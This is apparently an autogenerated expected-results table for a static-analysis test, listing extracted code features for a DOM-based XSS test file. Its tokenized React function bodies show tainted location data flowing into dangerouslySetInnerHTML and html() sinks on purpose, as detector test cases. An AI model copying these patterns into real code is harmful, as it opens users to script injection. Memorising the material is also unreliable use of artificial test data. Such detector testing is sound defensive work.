$ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:247:39:247:55 | props.propTainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:247:39:247:55 | props.propTainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:247:45:247:55 | propTainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:247:45:247:55 | propTainted | contextSurroundingFunctionParameters | ()\n(props) | +| autogenerated/Xss/DomBasedXss/tst.js:247:45:247:55 | propTainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:247:45:247:55 | propTainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:247:45:247:55 | propTainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:250:9:250:14 | render | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:250:9:250:14 | render | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:250:9:250:14 | render | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:250:9:250:14 | render | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:250:9:250:14 | render | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:250:9:252:9 | render( ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:250:9:252:9 | render( ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:250:9:252:9 | render( ... } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:250:9:252:9 | render( ... } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:250:9:252:9 | render( ... } | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:250:9:252:9 | render( ... } | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:250:9:252:9 | render( ... } | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:250:9:252:9 | render( ... } | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:250:9:252:9 | render( ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:250:9:252:9 | render( ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:250:15:250:14 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:250:15:250:14 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:250:15:250:14 | this | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:250:15:250:14 | this | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:250:15:250:14 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:250:15:252:9 | 'arguments' object of method render of class C3 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:250:15:252:9 | 'arguments' object of method render of class C3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:250:15:252:9 | 'arguments' object of method render of class C3 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:250:15:252:9 | 'arguments' object of method render of class C3 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:250:15:252:9 | 'arguments' object of method render of class C3 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:250:15:252:9 | () {\\n ... } | assignedToPropName | render | +| autogenerated/Xss/DomBasedXss/tst.js:250:15:252:9 | () {\\n ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:250:15:252:9 | () {\\n ... } | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:250:15:252:9 | () {\\n ... } | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:250:15:252:9 | () {\\n ... } | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:250:15:252:9 | () {\\n ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:250:15:252:9 | exceptional return of method render of class C3 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:250:15:252:9 | exceptional return of method render of class C3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:250:15:252:9 | exceptional return of method render of class C3 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:250:15:252:9 | exceptional return of method render of class C3 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:250:15:252:9 | exceptional return of method render of class C3 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:250:15:252:9 | return of method render of class C3 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:250:15:252:9 | return of method render of class C3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:250:15:252:9 | return of method render of class C3 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:250:15:252:9 | return of method render of class C3 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:250:15:252:9 | return of method render of class C3 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:251:20:251:86 | | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:251:20:251:86 | | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:251:20:251:86 | | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:251:20:251:86 | | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:251:20:251:86 | | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:251:21:251:24 | span | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:251:21:251:24 | span | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:251:21:251:24 | span | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:251:21:251:24 | span | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:251:21:251:24 | span | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:251:26:251:48 | dangero ... nerHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:251:26:251:48 | dangero ... nerHTML | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:251:26:251:48 | dangero ... nerHTML | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:251:26:251:48 | dangero ... nerHTML | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:251:26:251:48 | dangero ... nerHTML | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:251:26:251:84 | dangero ... inted}} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:251:26:251:84 | dangero ... inted}} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:251:26:251:84 | dangero ... inted}} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:251:26:251:84 | dangero ... inted}} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:251:26:251:84 | dangero ... inted}} | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:251:26:251:84 | dangero ... inted}} | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:251:26:251:84 | dangero ... inted}} | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:251:26:251:84 | dangero ... inted}} | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:251:26:251:84 | dangero ... inted}} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:251:26:251:84 | dangero ... inted}} | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:251:51:251:83 | {__html ... ainted} | assignedToPropName | dangerouslySetInnerHTML | | autogenerated/Xss/DomBasedXss/tst.js:251:51:251:83 | {__html ... ainted} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:251:51:251:83 | {__html ... ainted} | contextSurroundingFunctionParameters | ()\n() | | autogenerated/Xss/DomBasedXss/tst.js:251:51:251:83 | {__html ... ainted} | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:251:51:251:83 | {__html ... ainted} | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:251:51:251:83 | {__html ... 